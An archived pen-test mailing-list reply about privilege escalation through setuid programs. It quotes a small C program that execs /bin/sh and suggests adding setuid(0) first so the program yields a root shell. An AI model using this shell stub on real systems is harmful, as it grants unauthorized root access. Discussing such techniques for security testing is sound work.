Re: question on escalating privileges via suid vulnerabilities

On Saturday 24 February 2007 19:52, John McGuire wrote:
#include <stdio.h>
int main() {
       char *arr[2];
       arr[0] = "/bin/sh";
       arr[1] = NULL;
       execve (arr[0], arr, NULL);
}

Try with "setuid(0);" before execve :-)
--
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.

http://rawlab.mindcreations.com

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

Relevant Pages

  • Fwd: Re: tools to scan source code
    ... design) that can only be found with manual secure code reviews and secure architecture ... Need to secure your web apps? ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • RE: Fwd: Re: tools to scan source code
    ... design) that can only be found with manual secure code reviews and secure architecture ... Need to secure your web apps? ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • RE: stupid IE7 question
    ... I am currently testing a proprietary secure web based ... Need to secure your web apps? ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • Re: pentest documentation
    ... Need to secure your web apps? ... Cenzic Hailstorm finds vulnerabilities fast. ... Click the link to buy it, try it or download Hailstorm for FREE. ...
    (Pen-Test)
  • RE: Old @Stake Tools
    ... Anyone know where to find some of the old @stake tools? ... Need to secure your web apps? ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)